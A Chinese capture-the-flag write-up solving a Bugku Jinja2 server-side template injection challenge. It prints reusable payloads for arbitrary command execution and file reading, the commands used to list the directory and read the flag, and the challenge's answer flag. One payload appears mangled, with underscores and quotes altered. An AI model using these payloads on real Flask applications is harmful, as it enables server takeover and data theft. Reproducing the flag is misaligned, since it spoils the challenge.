一、题目链接

https://ctf.bugku.com/challenges/detail/id/203.html

二、解法步骤

  题目是SSTI，也就是服务器模板注入，页面提示我们需要传递一个flag参数。

　　由于是模板，可以传flag={{config}}看看：

　　显示

　　说明这里存在命令执行的漏洞，查询资料发现此处可以执行jinja2模板的语法。参考资料：https://blog.csdn.net/weixin_30802953/article/details/113013342

  在jinja2中是可以直接访问python的一些对象及其方法的。要想利用jinja2语法执行Python调用系统命令，就需要用到python沙盒逃逸：绕过模拟的Python终端，最终实现命令执行。

  共有两条代码：

命令执行：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('这里输入命令').read()") }}{% endif %}{% endfor %}

文件操作：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输入文件名', 'r').read() }}{% endif %}{% endfor %}

  本题我们先进行命令执行，看下目录下有没有文件：

?flag={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}

发现了flag文件，然后使用文件操作打开。

?flag={% for c in [].class.base.subclasses() %}{% if c.name==‘catch_warnings’ %}{{ c.init.globals[‘builtins’].open(‘flag’, ‘r’).read() }}{% endif %}{% endfor %}

   拿下flag：flag{9e1f1ab0c403a2020a9f8ec65688fc99}

三、总结

  本题考了SSTI与jinja2模板引擎。SSTI（Server-Side Template Injection）是一种安全漏洞，可以利用模板引擎解析器来执行恶意代码。在Flask框架中，如果使用了Jinja2模板引擎，并且没有正确地过滤用户输入的数据，攻击者可以通过构造特殊的payload，在模板渲染过程中执行任意代码，从而实现代码注入和服务器接管等攻击。jinja2的两条执行代码可以积累下来，下次碰到了直接用。